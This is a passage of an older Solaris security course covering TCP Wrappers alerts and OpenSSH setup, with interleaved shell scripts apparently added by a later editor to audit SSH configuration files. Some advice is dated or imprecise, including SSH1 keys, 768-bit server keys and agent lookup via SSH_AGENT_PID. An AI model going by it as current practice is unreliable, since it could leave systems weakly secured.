Enhance your TCP Wrappers configuration to use the write command to send a message to the root user whenever an attempt to use the telnet command is denied (include the client’s IP address and host name in the message).

Update the entry for your workstation in the /etc/hosts.deny file:

in.telnetd: hostname : banners /etc/tcpd.deny: spawn echo "telnet intruder %h(%a)" | write root

Test your changes by running telnet from a shell window to connect back to your system. You should receive your banner message as before, and all your shell windows should show a write message:

# telnet localhost
...
Message from root on wallace (pts/6) [ Fri May 25 12:57:28 ] ...
telnet intruder wallace(192.168.0.250)
<EOT>

Configuring TCP Wrappers to Deny Access to All Hosts Except Those Specified

1. Configure your system so that all systems other than your workstation and the instructor’s workstation are denied access to the telnet service:

a. Create a file called /etc/hosts.allow with the following entries (assuming the instructor’s system is called grommit and your system is wallace):

in.telnetd: wallace, grommit

b. Update the single line in the /etc/hosts.deny file to deny all hosts (remove the spawn option to avoid unwanted write commands being issued):

in.telnetd: ALL: banners /etc/tcpd.deny

2. Remove all access controls for network services on your system by either:

Removing the /etc/hosts.deny and /etc/hosts.allow files:

# rm /etc/hosts.deny /etc/hosts.allow

Or restoring the original telnet entry in the /etc/inetd.conf file:

telnet stream tcp6 nowait root /usr/sbin/in.telnetd in.telnetd

Removing Host Access Control

Remove your host access files to prevent host access control from interfering with future module exercises:

# rm /etc/hosts.allow /etc/hosts.deny


Module 16

Securing Remote Access

Objectives

Upon completion of this module, you should be able to:

● Identify the benefits of the secure shell

● Install and configure the secure shell

● Use the secure shell


Relevance


Discussion – The following questions are relevant to securing remote access:

● Do you regularly use the Berkeley r commands (such as rsh, rlogin, and rcp) or telnet for remote access?

● How can you make these commands easier or more convenient to use?

● What are the security implications of these strategies?

● What methods are available to make such tools secure?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● OpenSSH, http://www.openssh.com/

● Online man pages for the OpenSSH utilities ssh(1), scp(1), ssh-add(1), ssh-agent(1), ssh-keygen(1), and sshd(8)

● Solaris OE Freeware, http://www.sunfreeware.com/

● Gregory, Peter H., Solaris Security. Prentice Hall, 2000.

● Barrett, Daniel J. and Silverman, Richard E., SSH: The Secure Shell, The Definitive Guide (the Snail Book), O’Reilly and Associates, 2000.

● Barrett, Daniel J. and Silverman, Richard E., Web site for the Snail Book, http://www.snailbook.com


Identifying the Benefits of the Secure Shell

The secure shell (OpenSSH) is one utility in a set of utilities in the OpenSSH suite of tools. This suite of tools replaces remote access programs such as telnet and the Berkeley r commands (rlogin, rsh, rcp). The OpenSSH tools provide improved security and functionality compared with the other suites of tools, and require little learning for users familiar with the old commands. The latest version of OpenSSH also contains a secure replacement for FTP.

The OpenSSH design philosophy is:

● Never trust the network (or any component of it, such as a DNS server).

● Place a minimum of trust in the remote server.

To obtain a high level of security, OpenSSH uses encryption and authentication algorithms, and in particular uses a form of cryptography known as public key encryption. These functions have resulted in a very secure set of tools.


The SSH protocol is almost an Internet standard (it does not have an RFC number allocated yet), and many SSH clients are available for a wide range of operating systems. A user without root access can install SSH (with reduced functionality). You can set SSH to revert to the Berkeley r commands if SSH is not available on the remote server.

SSH is often supported as a secure transport mechanism. For example, utilities such as CVS and rsync can use SSH for the secure transfer of files.

The original SSH program was written by Tatu Ylonen of Finland in 1995 and released as freeware, although it is now being marketed commercially. OpenSSH is a derivative of an early version of SSH. OpenSSH is being developed independently and is available for free on the Web.


OpenSSH Tools

The OpenSSH suite of tools consists of the following programs:

● ssh(1) – The client program used to log into another machine or to execute commands on the other machine. (slogin is often used as an alias for ssh.)

● scp(1) – Securely copies files from one machine to another. scp(1) can copy recursively, and it can copy files between two remote machines.

● ssh-keygen(1) – Creates authentication keys for server and client authentication.

● ssh-agent(1) – An authentication agent that holds keys on behalf of the user. ssh-agent(1) eliminates the need to constantly enter passphrases to unlock keys.

● ssh-add(1) – Registers new keys with the authentication agent.

● ssh-keyscan(1) – Obtains public keys from servers.

● sftp(1) – A secure version of FTP


● sshd(8) – The server program that runs on the server machine. It listens for connections from clients (ssh or scp). When it receives a connection, sshd(8) performs authentication and begins serving the client.

● sftp-server(8) – The server program that processes requests from sftp.


Using Encryption and Compression

OpenSSH is more secure than the Berkeley r commands because the tools are immune to network monitoring. All authentication information and session data is encrypted. Session data can be just as valuable as the authentication information, because it might contain passphrases, credit card or bank details, and other sensitive information.

To encrypt the communication session, the client and server generate and exchange a session key using the RSA (Rivest, Shamir and Adleman, the professors who created the algorithm) public key algorithm. After the session key is exchanged, all traffic between the client and server is encrypted and safe from anyone monitoring the network.

OpenSSH also performs compression. Compression can improve performance, for example in situations when you are copying large files over slow connections.


Security Benefits of Server Authentication

OpenSSH prevents spoofing or “man-in-the-middle” attacks. This class of attacks involves fooling a client into accessing another server instead of the one the client wants. Spoofing can be done with a compromised router or a DNS server.

When the client connects to the untrusted server, it reveals the authentication information, and the untrusted server uses this information to connect to the true server as the client. The untrusted server passes information between the client and the true server and thereby obtains both the authentication information and the session data.

To prevent this class of attack, OpenSSH uses the RSA public key algorithm for authenticating servers. The server generates a public and private RSA key pair (RSA keys always come in pairs). The public key is distributed to clients and authenticates the server (because only the server has the private key that creates the authentication certificates).


The first time an OpenSSH program connects to a server, it records the server’s public key in a file. If the client connects to the same server later and the public key has changed, the client knows a spoofing attack might be happening. The client is warned and is asked whether it wants to proceed (the server might have been upgraded and generated a new key).

The current server authentication scheme means there can be a spoofing attack on the very first connection to a server. One solution to this problem might be to use certificates in the same way as the Secure Sockets Layer (SSL) security protocol.

Certificates make the software and administration procedure more complicated because certificates must be certified by a certification authority and checked against revocation lists. Certificates are better used as a digital identity, where you do not know the second party.

With remote access, however, you usually know the other party, so you can avoid the use of certificates and check the key fingerprint on the first connection. Another option is to manually record the correct server key in the known_hosts file. The ssh-keyscan program can create known_hosts files.
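The three outcomes the client distinguishes when it consults known_hosts (no entry yet, entry matches, entry differs) are what the two paragraphs above describe. The shell script below is an added example, not part of the course or of OpenSSH, that reproduces that decision over a constructed known_hosts file. The key strings are placeholders standing in for real base64-encoded RSA public keys; the host names grommit and wallace are the ones this course uses, and penguin and the "record" step are assumptions for illustration. The real client derives the fingerprint it shows you from the key bytes, which this script does not attempt.

```shell
#!/bin/sh
# Added example, not part of the course: the decision a client makes when
# it compares a server's presented host key against ~/.ssh/known_hosts.
# Uses constructed key material (placeholder strings, not real RSA keys)
# in a temporary file; only the decision logic is of interest.

KNOWN_HOSTS=$(mktemp)
# Constructed known_hosts lines: "hostname keytype base64-key"
printf '%s\n' \
  'grommit ssh-rsa AAAAB3-placeholder-key-for-grommit' \
  'wallace ssh-rsa AAAAB3-placeholder-key-for-wallace' > "$KNOWN_HOSTS"

# host_key_status HOST PRESENTED_KEY -> prints one of
#   new      : no entry yet; this is the first connection, the one moment
#              the text says a spoofing attack cannot be detected
#   match    : the recorded key equals the presented key
#   changed  : the recorded key differs, so either the server was rekeyed
#              or a spoofing attack is under way; the client warns here
host_key_status() {
    h=$1; presented=$2
    recorded=$(awk -v h="$h" '$1 == h { print $2 " " $3; exit }' "$KNOWN_HOSTS")
    if [ -z "$recorded" ]; then
        echo new
    elif [ "$recorded" = "$presented" ]; then
        echo match
    else
        echo changed
    fi
}

# record_host_key HOST KEY: what happens after the user accepts a new key,
# or what appending ssh-keyscan output to known_hosts achieves ahead of
# time. A changed key is deliberately never overwritten here: that is a
# decision for a person who has checked the fingerprint out of band.
record_host_key() {
    case "$(host_key_status "$1" "$2")" in
        new) printf '%s %s\n' "$1" "$2" >> "$KNOWN_HOSTS" ;;
    esac
}

host_key_status grommit 'ssh-rsa AAAAB3-placeholder-key-for-grommit'   # match
host_key_status grommit 'ssh-rsa AAAAB3-different-key'                 # changed
host_key_status penguin 'ssh-rsa AAAAB3-placeholder-key-for-penguin'   # new
record_host_key penguin 'ssh-rsa AAAAB3-placeholder-key-for-penguin'
host_key_status penguin 'ssh-rsa AAAAB3-placeholder-key-for-penguin'   # match
```

Pre-populating known_hosts (with ssh-keyscan output or a copy of /etc/ssh_host_key.pub obtained through a trusted channel) turns the "new" case into "match" before any network connection is made, which is the mitigation the text recommends for the first-connection problem.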


Client Authentication

OpenSSH uses RSA encryption keys for authentication. Like server authentication keys, RSA encryption keys consist of public and private components. Authentication uses a challenge-response algorithm, where the server generates a challenge and the client must provide the correct response. The client uses the key’s private component to generate the correct response, and the server verifies it using the key’s public component. You must register the public component of the client key with the server for your client to be granted remote access. Because the server never accesses the client’s private key, an intruder on a compromised server cannot obtain the client’s keys.

On a standard, passphrase-based system an intruder could collect passphrases from clients as they connected. This is why you should not use the same passphrase for multiple servers. However, with OpenSSH client keys, you do not have a security problem using a single key for all accounts.


The client’s public and private key pair are stored in the user’s home directory. To prevent the theft of a user’s key (perhaps when a machine is left unattended), the private key is usually encrypted with a passphrase. When you use the OpenSSH tools with RSA authentication, the passphrase is only used to encrypt the private key; it is not directly used for authentication.

Forwarding TCP/IP Ports Using OpenSSH

Port forwarding is an OpenSSH process where the ssh program:

● Connects to a remote server

● Listens on various ports on this server

● Forwards all traffic to and from ports on the client machine

For instance, X clients (such as xterm) typically communicate with the X server using port 6000. By configuring the ssh program to listen on port 6000 when logged into the remote machine and forwarding traffic to and from port 6000 on the local machine (where the X server is running), it appears that there is an X server running locally on the remote machine that X clients can use. Figure 16-1 demonstrates X11 port forwarding.

Figure 16-1 X11 Port Forwarding


Without port forwarding, the X11 session must be transmitted unencrypted, as shown in Figure 16-2.

Figure 16-2 X11 Session Without Port Forwarding

Using the ssh port forwarding feature means that X clients can use the SSH-encrypted communication channel instead of making a direct (and potentially insecure) connection to the client.

X11 is not the only application that makes use of port forwarding, but it is the most common one. Because X11 is so common, the ssh program forwards the appropriate X11 ports by default, and sets the DISPLAY environment variable for use by the X11 programs on the server.


Copying Files and Executing Commands

The ssh program does not just provide a login shell on a remote machine. You can use the ssh program to execute commands remotely (similarly to rsh, except that with the ssh program you have the security benefits described previously in “Identifying the Benefits of the Secure Shell” on page 16-4). Executing commands remotely is useful when you build scripts, especially when you use the ssh program’s automatic authentication features.

The scp program is the OpenSSH replacement for rcp. The security benefits described previously in “Identifying the Benefits of the Secure Shell” on page 16-4 apply. As with the ssh program, the automatic authentication features can make scp particularly valuable when you write scripts.

In addition to the scp program, the OpenSSH tools include a secure version of FTP. The secure FTP allows you to transfer files in a secure and interactive manner.


Benefits of the Password Agent

OpenSSH includes the ssh-agent program. This is the passphrase agent that reduces the need to constantly enter the passphrases required for authentication keys. Run the ssh-agent program once at the beginning of a session, and the OpenSSH utilities obtain passphrases from the agent instead of interactively prompting the user. Use the ssh-add program to register the keys with the ssh-agent program, and from then on the OpenSSH utilities automatically obtain the keys from the agent.

An environment variable holds the process identifier of the ssh-agent program. The OpenSSH client uses this environment variable to determine which ssh-agent program to communicate with. You can use this information to create long-lasting ssh-agent programs, and to use ssh-agent programs with scripts.


Configuring the OpenSSH Server

The server configuration is stored in the /etc/sshd_config file. The default version of the sshd_config file is shown in Code 16-1.

Code 16-1 Default sshd_config File

1 # This is ssh server systemwide configuration file.
2
3 Port 22
4 #Protocol 2,1
5 #ListenAddress 0.0.0.0
6 #ListenAddress ::
7 HostKey /etc/ssh_host_key
8 ServerKeyBits 768
9 LoginGraceTime 600
10 KeyRegenerationInterval 3600
11 PermitRootLogin yes
12 #
13 # Don't read ~/.rhosts and ~/.shosts files
14 IgnoreRhosts yes
15 # Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
16 #IgnoreUserKnownHosts yes
17 StrictModes yes
18 X11Forwarding no
19 X11DisplayOffset 10
20 PrintMotd yes
21 KeepAlive yes
22
23 # Logging
24 SyslogFacility AUTH
25 LogLevel INFO
26 #obsoletes QuietMode and FascistLogging
27
28 RhostsAuthentication no
29 #
30 # This requires host keys in /etc/ssh_known_hosts
31 RhostsRSAAuthentication no
32 #
33 RSAAuthentication yes
34
35 # To disable tunneled clear text passphrases, change to no here!
36 PasswordAuthentication yes
37 PermitEmptyPasswords no
38 # Uncomment to disable s/key passwords
39 #SkeyAuthentication no
40
41 # To change Kerberos options
42 #KerberosAuthentication no
43 #KerberosOrLocalPasswd yes
44 #AFSTokenPassing no
45 #KerberosTicketCleanup no
46
47 # Kerberos TGT Passing does only work with the AFS kaserver
48 #KerberosTgtPassing yes
49
50 #CheckMail yes
51 #UseLogin no
52
53 #Subsystem sftp /usr/local/sbin/sftpd
54 #MaxStartups 10:30:60


You might want to modify the file to:

● Disable or enable certain forms of authentication (for example, you might enable .rhosts authentication by modifying lines 14 and 28).

● Use a non-standard port (sshd listens on port 22, shown on Line 3).

● Disable or enable X11 port forwarding (Line 18).

● Set the Syslog parameters (Lines 24 and 25).

● Change the file location where the authentication keys are stored (Line 7).

● Accept or deny root logins (Line 11). It is a good idea to deny root logins and use the su command for administration instead.

The server configuration applies to this particular host. You cannot define different settings based upon which users connect or where they connect from. You can, however, run two separate servers, each with its own configuration file, on different ports.
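The list above names the keywords an administrator usually changes. The shell script below is an added example, not part of the course or of OpenSSH: it reads an sshd_config with the "last uncommented occurrence wins" rule, reports the settings from that list that are still at their permissive default (root logins, tunneled password authentication, .rhosts trust, X11 forwarding), and writes a corrected copy. It runs over a constructed copy of the Code 16-1 defaults in a temporary file; on a real host, SSHD_CONFIG would point at /etc/sshd_config, and sshd must be restarted (or sent SIGHUP) before the new file takes effect. The four keywords and their values are the ones shown in Code 16-1; nothing else about the server is assumed.

```shell
#!/bin/sh
# Added example, not part of the course: report the permissive settings
# the module says you might want to change in sshd_config, and write a
# hardened copy. Runs on a constructed copy of the Code 16-1 defaults.

SSHD_CONFIG=$(mktemp)
cat > "$SSHD_CONFIG" <<'EOF'
# Constructed from the default sshd_config shown in Code 16-1
Port 22
HostKey /etc/ssh_host_key
PermitRootLogin yes
IgnoreRhosts yes
X11Forwarding no
SyslogFacility AUTH
LogLevel INFO
RhostsAuthentication no
RhostsRSAAuthentication no
RSAAuthentication yes
PasswordAuthentication yes
PermitEmptyPasswords no
EOF

# setting FILE KEYWORD: print the effective value of KEYWORD (the last
# uncommented occurrence wins if it is repeated; empty if it is unset).
setting() {
    awk -v k="$2" '$1 == k { v = $2 } END { print v }' "$1"
}

# audit FILE: print one line per permissive setting; prints nothing if clean.
audit() {
    f=$1
    [ "$(setting "$f" PermitRootLogin)" = yes ] &&
        echo "PermitRootLogin yes: root can log in directly (Line 11); deny it and use su"
    [ "$(setting "$f" PasswordAuthentication)" = yes ] &&
        echo "PasswordAuthentication yes: tunneled passwords accepted alongside RSA keys (Line 36)"
    [ "$(setting "$f" RhostsAuthentication)" = yes ] &&
        echo "RhostsAuthentication yes: .rhosts trust enabled (Line 28)"
    [ "$(setting "$f" X11Forwarding)" = yes ] &&
        echo "X11Forwarding yes: X11 sessions are forwarded through the server (Line 18)"
    return 0
}

# harden IN OUT: copy IN to OUT with each of the four settings set to no.
harden() {
    sed -e 's/^PermitRootLogin[[:space:]].*/PermitRootLogin no/' \
        -e 's/^PasswordAuthentication[[:space:]].*/PasswordAuthentication no/' \
        -e 's/^RhostsAuthentication[[:space:]].*/RhostsAuthentication no/' \
        -e 's/^X11Forwarding[[:space:]].*/X11Forwarding no/' "$1" > "$2"
}

HARDENED=$(mktemp)
audit "$SSHD_CONFIG"            # the defaults produce two findings
harden "$SSHD_CONFIG" "$HARDENED"
audit "$HARDENED"               # prints nothing
```

Setting PasswordAuthentication to no means that only users whose public key is registered on the server (see "Client Authentication" above) can log in, so register and test the keys before applying that change to a host you administer remotely.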


Creating the Host Key

Before you can start the sshd server daemon, you must have the /etc/sshd_config file and a host key for the server. To create the key, use the ssh-keygen command.

Creating the host key is slightly different from creating the key for an individual user. When you create the key required to start the sshd daemon, you do not set a passphrase, because the daemon must be able to read the key without user interaction. The key is placed in the /etc/ssh_host_key file (using the -f argument), as shown in Code 16-2.

Code 16-2 Creating the Host Key

# ssh-keygen -f /etc/ssh_host_key
Generating RSA keys: Key generation complete.
Enter passphrase (empty for no passphrase): <enter>
Enter same passphrase again: <enter>
Your identification has been saved in /etc/ssh_host_key.
Your public key has been saved in /etc/ssh_host_key.pub.
The key fingerprint is:
bf:b3:a6:8e:2d:b1:86:63:64:44:b4:6f:52:cc:7e:42 root@grommit


Note – If you install OpenSSH from a source distribution instead of a binary distribution, the make install script generates and installs the server keys automatically. Code 16-2 on page 16-19 is the manual method of generating keys using the ssh-keygen command from a binary installation.


Starting the Secure Shell Daemon

Start the sshd server daemon by executing the sshd command:

# /usr/local/bin/sshd

The sshd command is usually placed in the /etc/rc2.d startup scripts and the server executes as a daemon in the background. You can execute the sshd server from inetd, but this has performance implications because the server needs to create session keys using the RSA algorithm. Creating session keys can be time consuming and might cause server delays. When the server runs as a daemon, the server calculates the session keys beforehand, so incoming connections are processed instantly.

You can run the server in debug mode by using the -d flag, which is useful for testing and debugging. When you run the server in debug mode:

● The server does not run in the background as a daemon

● All debugging and log information is displayed on the standard output, not in the log files

● The server exits after processing one connection


Installing the Secure FTP Server

The secure FTP server (sftp-server) requires no special installation or configuration. The sshd program starts sftp-server automatically whenever secure FTP requests are made to the server.


Using OpenSSH Clients

You can use the ssh program to obtain a shell on a remote machine, as with the rsh program, where the argument you provide is the remote machine name, as shown in Code 16-3.

Code 16-3 Running the ssh Program to Obtain a Remote Shell

$ ssh grommit
alice@grommit's password: <enter password>

In Code 16-3, the user is prompted for a passphrase on the remote machine. This is because the program uses standard passphrase-based authentication. When you add other types of authentication, this method changes.

In addition to starting a remote shell, you can run a command by providing a command as the second argument, as shown in Code 16-4 on page 16-24.

Code 16-4 Running a Command Using the ssh Program

$ ssh grommit w
alice@grommit's password: <enter password>
 8:51PM  up 38 days,  5:25, 4 users, load averages: 0.10, 0.17, 0.15
USER     TTY      FROM              LOGIN@   IDLE WHAT
gary     p0       pm00              6:16PM   2:00 -su (zsh)
gary     p1       node1005b.a2000.  05May01 20:07 -su (zsh)
gary     p2       pm00              6:51PM      - sshd:
gary     p3       pm00              8:06PM      - ./ssh/ssh 195.6

Use the scp program to copy files between machines, as shown in Code 16-5.

Code 16-5 Using the scp Program to Copy Files

$ scp grommit:/etc/motd /tmp/motd
alice@grommit's password: <enter password>
/etc/motd    100%|********************************************************************|   344    00:00

Note – Some later versions of the OpenSSH utilities display the remote environment variables on the error output. This does not usually cause problems, but if you want to keep the remote environment variables from being displayed, add 2>/dev/null to the example commands.

Determining Known Hosts

The first time you access a host with any of the OpenSSH clients, you see a message like that shown in Code 16-6.

Code 16-6 Determining Known Hosts

The authenticity of host '192.168.0.1' can't be established.
RSA key fingerprint is bf:b3:a6:8e:2d:b1:86:63:64:44:b4:6f:52:cc:7e:42.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.0.1' (RSA) to the list of known hosts.

This warning informs you that the host is unknown to you (although other users may have accessed this host), and asks whether the session should continue. If you decide to continue, the host key of the server is added to your file of known hosts ($HOME/.ssh/known_hosts), and subsequent access to that host continues without prompting. If, however, the host key changes, you get another warning because a man-in-the-middle attack might be occurring.

You can create a system-wide file of known hosts (/etc/ssh_known_hosts) containing the public keys of remote servers, so that the warning in Code 16-6 on page 16-25 is not displayed. The OpenSSH client checks for a known host in both the system-wide /etc/ssh_known_hosts file and the user's known_hosts file.
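As an added illustration of the check just described (example code written for this edition, not part of the course or of OpenSSH), the following POSIX shell function reproduces the client's known-hosts decision: a host whose recorded key matches in either the user's known_hosts or the system-wide ssh_known_hosts is accepted, an unknown host is reported as such, and a known host presenting a different key is reported as changed, the case the text flags as a possible man-in-the-middle attack. File paths are parameters, and the sample entries are constructed, not real keys.

```shell
#!/bin/sh
# Added example, not course code: reproduce the OpenSSH client's known-hosts
# decision for an SSH1 host key. Entries use the SSH1 known_hosts layout
# "host[,host...] bits exponent modulus [comment]"; the sample values below
# are constructed and are not real keys.

# check_host_key HOST "bits exponent modulus" FILE...
#   Searches every readable FILE (the user's known_hosts, then the
#   system-wide /etc/ssh_known_hosts, in the order given).
#   Prints and returns: known (0), unknown (1), changed (2).
check_host_key() {
    host=$1; key=$2; shift 2
    found=0; match=0
    for f in "$@"; do
        [ -r "$f" ] || continue
        while read -r names bits exp mod comment; do
            case $names in ''|'#'*) continue ;; esac
            # the first field is a comma-separated name list; match a whole name
            case ",$names," in
                *",$host,"*)
                    found=1
                    if [ "$bits $exp $mod" = "$key" ]; then match=1; fi
                    ;;
            esac
        done < "$f"
    done
    if [ "$match" -eq 1 ]; then echo known; return 0; fi
    # host is on record but with another key: the man-in-the-middle warning case
    if [ "$found" -eq 1 ]; then echo changed; return 2; fi
    echo unknown; return 1
}

# add_known_host HOST "bits exponent modulus" FILE
#   What the client does after you answer "yes": record the key so that later
#   connections to HOST are checked against it instead of prompting again.
add_known_host() {
    printf '%s %s\n' "$1" "$2" >> "$3"
}

# Demonstration with constructed files in a temporary directory.
tmp=$(mktemp -d)
cat > "$tmp/known_hosts" <<'EOF'
grommit,192.168.0.1 1024 35 123456789 alice@wallace
EOF
cat > "$tmp/ssh_known_hosts" <<'EOF'
pluto.sun.com 1024 35 987654321
EOF
for h in grommit 192.168.0.1 pluto.sun.com mars; do
    printf '%-14s %s\n' "$h" \
        "$(check_host_key "$h" '1024 35 123456789' "$tmp/known_hosts" "$tmp/ssh_known_hosts")"
done
# prints: known, known, changed (pluto's recorded key differs), unknown
add_known_host mars '1024 35 123456789' "$tmp/known_hosts"
printf '%-14s %s\n' mars \
    "$(check_host_key mars '1024 35 123456789' "$tmp/known_hosts" "$tmp/ssh_known_hosts")"
# prints: mars known
rm -rf "$tmp"
```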

Generating Client Keys

To create a client key, use the ssh-keygen command. This is the same command you use to generate a server key, except that now you should enter a passphrase when prompted (with the server key you used a null passphrase), as shown in Code 16-7.

Code 16-7 Generating Client Keys

$ ssh-keygen
Generating RSA keys:  Key generation complete.
Enter file in which to save the key (/home/alice/.ssh/identity): <enter>
Enter passphrase (empty for no passphrase): <enter passphrase>
Enter same passphrase again: <enter passphrase>
Your identification has been saved in /home/alice/.ssh/identity.
Your public key has been saved in /home/alice/.ssh/identity.pub.
The key fingerprint is:
21:35:ae:ce:7e:26:cc:b8:4d:20:b6:d7:75:c1:ea:e5 alice@wallace

It is more important to protect user keys with a passphrase than the server key, because user keys grant access to other systems. The server key is used only for host authentication, and clients generate a warning if it ever changes.

The generated keys reside in two files called identity and identity.pub, in the .ssh subdirectory of the user's home directory. The private key is stored in the identity file, in a binary format, while identity.pub is text and looks like Code 16-8 (but all on one line).

Code 16-8 The identity.pub File

1024 35 151365426291217189815524610281442736753289075746575514644915985081557493927016840417282917150595416208636742328036067599358117854181866462784837395878212144805532410422736696434143284988351805292331858166145450914307704579028223052539878277329051218647189125320683027483064540533807152609154470367552938409123 alice@wallace

Anything following the large number is only a comment and is ignored.

Granting Access to Other Users

With the Berkeley r commands, access to an account is usually granted using the .rhosts files. While you can enable this method (it is disabled by default), it is not recommended. Instead, grant access to an account using the authorized_keys file. This file resides in the same directory as the user's identity.pub file (usually $HOME/.ssh/).

Grant a user access to your account by copying the contents of their identity.pub file to your authorized_keys file. A typical authorized_keys file has several lines similar to the line in Code 16-8 on page 16-28, with one line for every authentication key that is granted access to the account. The name at the end of every line is only a comment, and is ignored.

Ideally, you should transfer the key in a secure manner, perhaps on a floppy disk or through some other secure channel such as encrypted email. One alternative is to email or copy the file in an insecure manner, and to verify the key fingerprint over the telephone.
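The copying step described above, as an added example written for this edition (not course code and not an OpenSSH tool): the function checks that the identity.pub line has the "bits exponent modulus [comment]" layout of Code 16-8, skips a key that is already present, comparing only the numbers because the trailing name is just a comment, and appends it otherwise. The fingerprint check over the telephone is a human step and is not done here; the sample key is constructed and far too short to be real.

```shell
#!/bin/sh
# Added example, not course code: grant a user access to an account by
# appending their SSH1 identity.pub line to authorized_keys. A key line must
# look like "bits exponent modulus [comment]"; the comment is ignored when
# looking for duplicates. The sample key below is constructed, not a real key.

# key_id LINE -> prints "bits exponent modulus" if LINE is a well-formed SSH1
#   public key (three decimal fields, optional comment); prints nothing otherwise.
key_id() {
    set -f                 # split on whitespace without letting * or ? expand
    set -- $1
    set +f
    [ $# -ge 3 ] || return 1
    for n in "$1" "$2" "$3"; do
        case $n in ''|*[!0-9]*) return 1 ;; esac
    done
    printf '%s %s %s\n' "$1" "$2" "$3"
}

# grant_access IDENTITY_PUB AUTHORIZED_KEYS
#   Prints and returns: added (0), duplicate (0), invalid (1).
grant_access() {
    pub=$1; auth=$2
    line=
    [ -r "$pub" ] || { echo invalid; return 1; }
    IFS= read -r line < "$pub" || [ -n "$line" ] || { echo invalid; return 1; }
    id=$(key_id "$line") || { echo invalid; return 1; }
    if [ -f "$auth" ]; then
        while IFS= read -r existing; do
            if [ "$(key_id "$existing")" = "$id" ]; then
                echo duplicate; return 0
            fi
        done < "$auth"
    fi
    printf '%s\n' "$line" >> "$auth"
    chmod 600 "$auth"      # sshd's StrictModes check refuses a file others can write
    echo added
}

# Demonstration with constructed files in a temporary directory.
tmp=$(mktemp -d)
printf '1024 35 1513654262912171898155246102814427367532890757 alice@wallace\n' \
    > "$tmp/identity.pub"
grant_access "$tmp/identity.pub" "$tmp/authorized_keys"            # added
grant_access "$tmp/identity.pub" "$tmp/authorized_keys"            # duplicate
# the same numbers with another comment are still the same key
printf '1024 35 1513654262912171898155246102814427367532890757 alice@home\n' \
    > "$tmp/identity2.pub"
grant_access "$tmp/identity2.pub" "$tmp/authorized_keys"           # duplicate
printf 'ssh-rsa not-an-ssh1-key\n' > "$tmp/bad.pub"
grant_access "$tmp/bad.pub" "$tmp/authorized_keys" || true         # invalid
cat "$tmp/authorized_keys"                                         # one line
rm -rf "$tmp"
```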

Using OpenSSH With RSA Authentication

When another user grants you access by adding your public key (your identity.pub file) to their authorized_keys file, you can access their account without using (or even knowing) their passphrase. For example, to use the ssh program to access user bob's account on machine grommit, enter the following:

$ ssh -l bob grommit
Enter passphrase for RSA key 'alice@wallace': <enter passphrase>

You are not asked for the passphrase for user bob, but you are asked for the passphrase to unlock your OpenSSH key. This also applies to the scp command.

Using the ssh-agent Program

When you perform remote commands (ssh) or remote file copies (scp), or when you run these programs from a script, you might want to avoid entering the passphrase for your key. To do this without removing the passphrase, use the ssh-agent program.

Execute the ssh-agent program with a parameter that is an executable command itself, and give it an environment with access to the client keys. Typically this parameter (program) is a shell or an X session. There are no client keys in the environment until you add them using the ssh-add program. You can also use the ssh-add program to view the keys in the ssh-agent environment. When keys have been added, you can use the ssh and scp commands without prompting for the passphrase.

Code 16-9 uses the ssh-agent program to start a subshell in which the OpenSSH clients are executed.

Code 16-9 Using the ssh-agent Program to Start a Subshell

$ ssh-agent ksh
$ ssh-add -l
The agent has no identities.
$ ssh-add
Need passphrase for /export/home/alice/.ssh/identity
Enter passphrase for alice@wallace: <enter passphrase>
Identity added: /export/home/alice/.ssh/identity (alice@wallace)
$ ssh-add -l
1024 49:4b:13:bb:6f:8e:46:d1:cd:f2:33:5b:04:99:bb:bd alice@wallace

You do not need to enter the passphrase for the ssh command, because it is now supplied by the ssh-agent program.

You can use the ssh-agent program without an argument. In this case, the ssh-agent program runs in the background, answering requests from OpenSSH clients. You must set the SSH_AGENT_PID environment variable for the OpenSSH clients to locate the agent and communicate with it. The easiest way to use OpenSSH in this mode is to evaluate the ssh-agent command as shown in Code 16-10.

Code 16-10 Running the ssh-agent Program in the Background

$ eval `ssh-agent`
$ ssh-add -l
The agent has no identities.
$ ssh-add
Need passphrase for /export/home/alice/.ssh/identity
Enter passphrase for alice@wallace: <enter passphrase>
Identity added: /export/home/alice/.ssh/identity (alice@wallace)
$ ssh-add -l
1024 49:4b:13:bb:6f:8e:46:d1:cd:f2:33:5b:04:99:bb:bd alice@wallace

You can also use the ssh-agent program by providing a command as an argument, in which case the environment variable is automatically set. The ssh-agent program exits when the command exits.

Using the Secure FTP Client

The sftp program is an interactive file transfer program, similar to the ftp(1) command. The sftp program performs all operations over an encrypted connection in the same way as the other OpenSSH clients. The sftp program uses many of the OpenSSH clients' features, such as public key authentication and compression. The sftp program connects and logs into the specified host, and then usually enters an interactive command mode. Use the sftp program instead of the scp program to allow interactive browsing of files and directories.

To start the sftp program, use the remote server name as an argument:

% sftp grommit

You can also use the sftp program by providing the name of a file to be retrieved as an argument (like scp):

% sftp grommit:/etc/motd

When you specify the file name, the file retrieval happens automatically once interactive user authentication has taken place. If the authentication method requires a passphrase, the user is prompted, and the transfer then happens automatically.

Configuring the Client

The client configuration is stored in the /etc/ssh_config file. The standard file contains only comments (as shown in Code 16-11), because the defaults are usually adequate.

Code 16-11 The /etc/ssh_config File

# This is ssh client systemwide configuration file.  This file provides
# defaults for users, and the values can be changed in per-user configuration
# files or on the command line.

# Configuration data is parsed as follows:
#  1. command line options
#  2. user-specific file
#  3. system-wide file
# Any configuration value is only changed the first time it is set.
# Thus, host-specific definitions should be at the beginning of the
# configuration file, and defaults at the end.

# Site-wide defaults for various options

# Host *
#   ForwardAgent yes
#   ForwardX11 yes
#   RhostsAuthentication yes
#   RhostsRSAAuthentication yes
#   RSAAuthentication yes
#   PasswordAuthentication yes
#   FallBackToRsh no
#   UseRsh no
#   BatchMode no
#   CheckHostIP yes
#   StrictHostKeyChecking no
#   IdentityFile ~/.ssh/identity
#   Port 22
#   Protocol 2,1
#   Cipher blowfish
#   EscapeChar ~

You can modify the file to:

● Specify the type of authentication used.

● Use a non-standard port.

● Specify the encryption algorithm used (the client determines the algorithm used, as long as the server supports it).

● Change the location of the files where the client keys are stored.

● Prevent access to servers whose authentication key is not known to the client (as opposed to warning the user that the key is unknown or changed). When this option is set, you must add new hosts to the known_hosts file manually or by using the ssh-keyscan program.

